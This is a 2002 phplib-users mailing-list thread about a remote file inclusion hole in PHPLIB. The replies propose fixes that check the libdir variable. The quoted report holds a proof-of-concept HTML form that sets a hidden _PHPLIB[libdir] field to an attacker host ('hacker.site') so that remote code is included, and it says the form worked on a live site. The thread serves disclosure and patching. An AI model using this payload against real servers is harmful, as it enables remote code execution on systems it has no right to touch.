RE: [Phplib-users] security hole !!!Remote code execution !!!
Brought to you by:
nhruby,
richardarcher
Menu
▾
▴
RE: [Phplib-users] security hole !!!Remote code execution !!!
|
From: Matt F. <ma...@sp...> - 2002-03-02 17:18:47
|
I just simply removed that code from my implementation of phplib - I
never have a need to include files from another server. I'd be surprised
if many apps would use this anyway.=20
Or you could do:
if( isset($_GET['_PHPLIB']) ) die("some message");
-----Original Message-----
From: php...@li...
[mailto:php...@li...] On Behalf Of Marcin
Pyla
Sent: Saturday March 2, 2002 11:51 AM
To: php...@li...
Subject: Re: [Phplib-users] security hole !!!Remote code execution !!!
Hello,
add checking $_PHPLIB["libdir"] before
include($_PHPLIB["libdir"] . "table.inc");
if in $_PHPLIB["libdir"] is string http:// then stop - exit;
It will be probably something like that:
if (preg_match('/^http:\/\//', $_PHPLIB["libdir"])) {
echo "Wrong \$_PHPLIB[\"libdir\"].";
exit;
}
include($_PHPLIB["libdir"] . "table.inc");
>
> files:
> /pages/new_user_alt.php3
> /pages/view_sessions.php3
> /pages/showoff.php3
>
> line:
> include($_PHPLIB["libdir"] . "table.inc");
>
> example:
>
> <form method=3DPOST
action=3D"http://phplib.sourceforge.net/showroom/view_sessions.php3">
> <input type=3Dhidden name=3D"_PHPLIB[libdir]"
value=3D"http://hacker.site/some_path/">
> <input type=3Dsubmit>
>
> versions tested: <7.4-pr1
>
> tested, (and works) on
> http://phplib.sourceforge.net/
Yes, I try and it works.
--=20
Pozdrawiam,
Marcin Pyla
(o_ [ <@ Marcin Pyla - Cubbi <cu...@se...> | <<+ NetArt ISP +>>
@> ]
(/)_ [ Odkryto, =BFe C++ posiada niesamowit=B1 zdolno=B6=E6 do ukrywania
]
[ nieistotnych detali w programach, takich jak bugi.
]
_______________________________________________
Phplib-users mailing list
Php...@li...
https://lists.sourceforge.net/lists/listinfo/phplib-users
|
